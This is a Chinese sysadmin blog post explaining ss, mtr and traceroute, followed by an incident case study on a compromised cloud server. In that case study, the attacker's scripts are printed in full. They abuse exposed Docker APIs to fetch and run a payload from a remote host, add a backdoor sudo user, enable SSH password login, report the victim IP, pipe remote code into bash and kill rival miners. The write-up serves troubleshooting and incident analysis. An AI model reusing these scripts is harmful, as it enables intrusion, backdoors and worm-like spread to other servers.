网络故障分析排查工具 mtr traceroute

netstat/ss

netstat由net-tool提供,ss由ipoute提供。

iproute已全面替代net-tools

区别在于ss比netstat快。

原因在于,netstat是遍历/proc下面每个PID目录,ss直接读/proc/net下面的统计信息。所以ss执行的时候消耗资源以及消耗的时间都比netstat少很多。
ss快的秘诀在于,它利用了TCP协议栈中tcp_diag,这是一个用于分析统计的模块,可以获得Linux内核中的第一手信息。如果系统中没有tcp_diag,ss也可以正常运行,只是效率会变得稍微慢但仍然比netstat要快。

route 

nmap

mtr  定位丢包点

一般用来在客户端和服务器之间进行双向mtr来定位丢包点。安装yum install mtr。

mtr (My traceroute)把 ping和 traceroute 的功能并入了同一个工具中,所以功能更强大。

mtr 默认发送 ICMP 数据包进行链路探测。可以通过 -u 参数来指定使用 UDP 数据包用于探测。

相对于 traceroute 只会做一次链路跟踪测试,mtr 会对链路上的相关节点做持续探测并给出相应的统计信息。所以,mtr能避免节点波动对测试结果的影响,所以其测试结果更正确,建议优先使用。

命令:mtr -n -i 1 -c 10 www.baidu.com

参数:

-n 不解析域名

-i 时间间隔

-c 次数

-r 直接显示最后报告

每列显示信息:

  • Host 主机IP或主机名

  • Loss 丢包率

  • Snt 发送的次数

  • Last 最近一次的返回时延

  • Avg 平均值

  • Best 最短的一次时间

  • Wrst 最长的一次时间

  • StDev 标准偏差

举例: 

从服务器到客户端,第一跳就有丢包了,说明服务器本身可能有问题

从客户端到服务器,最后一跳才发生丢包,基本可以确定是服务器系统内部问题

 

traceroute 定位路由器

利用ICMP 协议追踪源到目标之间的所有路由器,安装yum install traceroute。Windows 系统下是tracert

命令格式: traceroute[参数][主机]

参数:

-d 使用Socket层级的排错功能。
 
-f 设置第一个检测数据包的存活数值TTL的大小。
 
-F 设置勿离断位。
 
-g 设置来源路由网关,最多可设置8个。
 
-i 使用指定的网络界面送出数据包。
 
-I 使用ICMP回应取代UDP资料信息。
 
-m 设置检测数据包的最大存活数值TTL的大小。
 
-n 直接使用IP地址而非主机名称。
 
-p 设置UDP传输协议的通信端口。
 
-r 忽略普通的Routing Table,直接将数据包送到远端主机上。
 
-s 设置本地主机送出数据包的IP地址。
 
-t 设置检测数据包的TOS数值。
 
-v 详细显示指令的执行过程。
 
-w 设置等待远端主机回报的时间。
 
-x 开启或关闭数据包的正确性检验。

举例:

下面的探测数据,目标端口在第 11 跳之后就没有任何数据返回。说明相应端口在该节点被阻断。而该节点经查询归属北京移动,所以需要自行或者通过阿里云售后技术支持联系其做进一步排查分析。

[root@mycentos ~]# traceroute -T -p 135 www.baidu.com
traceroute to www.baidu.com (111.13.100.92), 30 hops max, 60 byte packets
 1  * * *
 2  192.168.17.20 (192.168.17.20)  4.115 ms  4.397 ms  4.679 ms
 3  111.1.20.41 (111.1.20.41)  901.921 ms  902.762 ms  902.338 ms
 4  111.1.34.197 (111.1.34.197)  2.187 ms  1.392 ms  2.266 ms
 5  * * *
 6  221.183.19.169 (221.183.19.169)  1.688 ms  1.465 ms  1.475 ms
 7  221.183.11.105 (221.183.11.105)  27.729 ms  27.708 ms  27.636 ms
 8  * * *
 9  * * *
10  111.13.98.249 (111.13.98.249)  28.922 ms 111.13.98.253 (111.13.98.253)  29.030 ms  28.916 ms
11  111.13.108.22 (111.13.108.22)  29.169 ms  28.893 ms 111.13.108.33 (111.13.108.33)  30.986 ms
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * * *
18  * * *
19  * * *
20  * * *
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *

 

 

记一次吐血的ping: unknown host

背景:

 某客户的ECS,ping域名提示unknown host,ping ip则可以通,ping的时候抓包没有解析的包出去,是解析的问题吗?

1,测试ping域名以及抓包发现没有dns的解析包出去

# ping www.baidu.com -c 1
ping: unknown host www.baidu.com
# tcpdump -i any port 53 -nnvv
tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes

2,测试ping ip dig getent等工作正常

# ping -c 1 115.239.210.27
PING 115.239.210.27 (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.87 ms

--- 115.239.210.27 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.875/1.875/1.875/0.000 ms
# getent hosts www.baidu.com
115.239.211.112 www.a.shifen.com www.baidu.com
115.239.210.27  www.a.shifen.com www.baidu.com
# dig www.baidu.com +short
www.a.shifen.com.
115.239.210.27
115.239.211.112

3,通过上述的测试可以确定,并非dns工作出现了问题,而是ping本身出现了问题
网络故障分析排查工具 mtr traceroute_第1张图片

4,通过strace跟踪看下ping命令在运行的过程中加载文件是否有问题?

# strace -e open ping www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libattr.so.1", O_RDONLY|O_CLOEXEC) = 3
......
open("/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
ping: unknown host www.baidu.com
+++ exited with 2 +++
正常的对比(版本不同有差异)
# strace -e open ping -c 1 www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcrypto.so.10", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
.......

5,提取所有的Permission denied的文件,查看权限(被我精简了一些)

# strace -e open -o p.out ping www.baidu.com |grep -i "Permission denied" p.out| awk -F "\\\"" '{print $2}'|xargs stat
  File: ‘/usr/lib/locale/locale-archive’
  Size: 106065056     Blocks: 207096     IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132883      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.523000000 +0800
Modify: 2015-07-13 15:21:14.804155630 +0800
Change: 2015-07-13 15:21:14.804155630 +0800
 Birth: -
  File: ‘/usr/share/locale/locale.alias’
  Size: 2502          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132816      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:48:09.380738442 +0800
Modify: 2015-03-06 05:18:56.000000000 +0800
Change: 2015-07-13 15:21:09.324089405 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules.cache’
  Size: 26254         Blocks: 56         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394951      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.878000000 +0800
Modify: 2015-07-13 15:21:15.860168393 +0800
Change: 2015-07-13 15:21:15.860168393 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules’
  Size: 56377         Blocks: 112        IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394941      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2015-07-13 15:21:15.857168356 +0800
Modify: 2015-03-06 05:18:55.000000000 +0800
Change: 2015-07-13 15:21:15.510164163 +0800
 Birth: -
  File: ‘/etc/resolv.conf’
  Size: 109           Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 660033      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:50:51.650325504 +0800
Modify: 2019-05-10 21:47:49.650000000 +0800
Change: 2019-05-10 21:47:49.650000000 +0800
 Birth: -
  File: ‘/etc/nsswitch.conf’
  Size: 1728          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658832      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:44.965000000 +0800
Modify: 2015-07-13 15:21:28.905326045 +0800
Change: 2015-07-13 15:21:28.905326045 +0800
 Birth: -
  File: ‘/etc/ld.so.cache’
  Size: 44226         Blocks: 88         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658829      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:33.738000000 +0800
Modify: 2019-03-22 00:16:26.262531411 +0800
Change: 2019-03-22 00:16:26.262531411 +0800
 Birth: -
  File: ‘/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -
  File: ‘/usr/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -

6,对比文件权限也没有发现明显的异常,我不禁有点麻爪,陷入深深的思考中
网络故障分析排查工具 mtr traceroute_第2张图片

7,尝试往被黑的方向排查 ,校验rpm包,替换ping命令,以及检查入侵痕迹

#  for i in $(rpm -qa);do rpm --verify $i ||echo $i ;done|grep bin |grep -v "node_modules"
S.5......    /usr/bin/git
S.5......    /usr/bin/git-receive-pack
S.5......    /usr/bin/git-shell
S.5......    /usr/bin/git-upload-archive
S.5......    /usr/bin/git-upload-pack
# lsmod
Module                  Size  Used by
tcp_diag               12591  0
inet_diag              18543  1 tcp_diag
dm_mirror              22135  0
......
ata_piix               35038  0
i2c_core               40325  3 drm,i2c_piix4,drm_kms_helper
libata                218854  3 pata_acpi,ata_generic,ata_piix

命令,进程,module都没有明显异常
网络故障分析排查工具 mtr traceroute_第3张图片网络故障分析排查工具 mtr traceroute_第4张图片

8,重新回到问题本身,权限访问有问题,因此到根目录下,挨个看权限

# ls -l
total 136
-rwxrwxrwx    1 root root  1963 Feb 27 03:38 autom.sh
lrwxrwxrwx.   1 root root     7 Nov 21  2014 bin -> usr/bin
dr-xr-xr-x.   4 root root  4096 May 10 21:47 boot
drwxr-xr-x   19 root root  3040 May 10 21:50 dev
drwxr-xr-x. 102 root root 12288 May 10 21:50 etc
drwxr-xr-x.   8 root root  4096 Mar 22 00:15 home
lrwxrwxrwx.   1 root root     7 Nov 21  2014 lib -> usr/lib
lrwxrwxrwx.   1 root root     9 Nov 21  2014 lib64 -> usr/lib64
drwxrwxrwx    2 root root  4096 Jan 29 17:57 logs
drwx------.   2 root root 16384 Nov 22  2014 lost+found
drwxr-xr-x.   2 root root  4096 Jun 10  2014 media
drwxr-xr-x.   3 root root  4096 Oct 23  2015 mnt
lrwxrwxrwx    1 root root     9 Oct 23  2015 opt -> /mnt/opt/
drwxrwxr-x    3 root root  4096 Oct  9  2018 path
dr-xr-xr-x   93 root root     0 May 10 21:50 proc
dr-xr-x---.  30 root root  4096 May 10 23:36 root
drwxr-xr-x   30 root root   840 May 10 21:51 run
lrwxrwxrwx.   1 root root     8 Nov 21  2014 sbin -> usr/sbin
drwxrwxr-x    6 root root  4096 Jan 29 17:54 shell
drwxrwxr-x    7 root root  4096 Jan 29 20:20 springbootdemo2
drwxr-xr-x.   2 root root  4096 Jun 10  2014 srv
dr-xr-xr-x   13 root root     0 May 11  2019 sys
-rwxrwxrwx    1 root root   356 Nov  1  2018 test1.sh
-rwxrwxrwx    1 root root   127 Nov  1  2018 test2.sh
drwxrwxrwt.  26 root root 40960 May 11 00:10 tmp
drwxrwxr-x    3 root root  4096 Dec 22 14:48 Users
drwxr-xr-x.  14 root root  4096 Aug  6  2018 usr
drwxr-xr-x.  23 root root  4096 May  6 11:31 var

9,对比权限没有发现问题,发现了几个脚本,看看脚本是做什么的

# cat test1.sh test2.sh
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
echo NOW WORKING ON $HOSTLINE
docker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "yum install wget -y;apt-get install wget -y;wget http://51.*.*.146/autom.sh -O /autom.sh;chmod 777 /autom.sh;sh /autom.sh"
echo DONE WITH $HOSTLINE
sed -i '1d' $1
done <$1
-----------------
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
sh test1.sh $1 & sleep 7; sed -i '1d' $1;
done <$1
-----------------
# cat autom.sh
#!/bin/sh
useradd -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
adduser -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
usermod -aG sudoers akay;
usermod -aG root akay;
sudo adduser akay sudo;
echo 'akay  ALL=(ALL:ALL) ALL' >> /etc/sudoers;
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config;
curl icanhazip.com >/tmp/myip.txt
ip=$(cat /tmp/myip.txt)
curl http://51.*.*.146/ip.php?ip=$ip
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
/etc/rc.d/sshd restart;
systemctl restart sshd;
systemctl restart ssh;
apt-get install screen -y
yum install screen -y
if [ $(dpkg-query -W -f='${Status}' systemd 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install systemd -y;
  yum install systemd -y;
fi;
if [ $(dpkg-query -W -f='${Status}' masscan 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install masscan -y;
  yum install masscan -y;
fi;
if [ $(dpkg-query -W -f='${Status}' iproute2 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install iproute2 -y;
  yum install iproute2 -y;
fi;
curl -s http://51.*.*.146/logo9.jpg | bash -s
wget http://51.*.*.146/test1.sh -O test1.sh;
wget http://51.*.*.146/test2.sh -O test2.sh;
#wget http://51.*.*.146/scanner.sh -O scanner.sh;
sleep 2s;
chmod 777 test1.sh;
chmod 777 test2.sh;
sleep 2s;
killall xmrig;
killall xm;
killall proc;
killall minergate-cli;
killall xmr-stak;
pkill -f xmrig;
pkill -f xmr-stak;
pkill -f xm;
kill -9 xmrig;
kill -9 xmr-stak;
kill -a xmrig;
kill -a xmr-stak;
kill -a xm;
sudo killall minergate-cli;
sudo kill -9 minergate-cli;
sudo pkill -f minergate-cli;
sudo killall proc;
sudo kill -9 proc;
sudo pkill -f proc;
sudo killall xmrig;
sudo killall xmr-stak;
sudo pkill -f xmrig;
sudo pkill -f xmr-stak;
sudo kill -9 xmrig;
sudo kill -9 xmr-stak;
sudo kill -a xmrig;
sudo kill -a xmr-stak;
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl disable bashd.service;
#sudo sh scanner.sh &

10,原来真的被黑了,建议客户购买安全应急服务期间,抱着研究的目的继续看ping的问题
网络故障分析排查工具 mtr traceroute_第5张图片

11,灵光一闪,根目录自身是什么权限?(不用纠结时间,为了写这篇文章我重新做了很多测试)

有问题的机器
# ls -ld /
dr--------. 22 root root 4096 May 10 21:47 /
正常的机器
# ls -ld /
dr-xr-xr-x. 19 root root 4096 Apr 30 17:33 /
# chmod 555 /
# ping -c 2 www.baidu.com
PING www.a.shifen.com (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.84 ms
64 bytes from 115.239.210.27: icmp_seq=2 ttl=55 time=1.86 ms

--- www.a.shifen.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 1.842/1.854/1.866/0.012 ms

大功告成~!网络故障分析排查工具 mtr traceroute_第6张图片

https://yq.aliyun.com/articles/702074?spm=a2c4e.11153959.0.0.e49327eepZ2Vi3

你可能感兴趣的:(网络)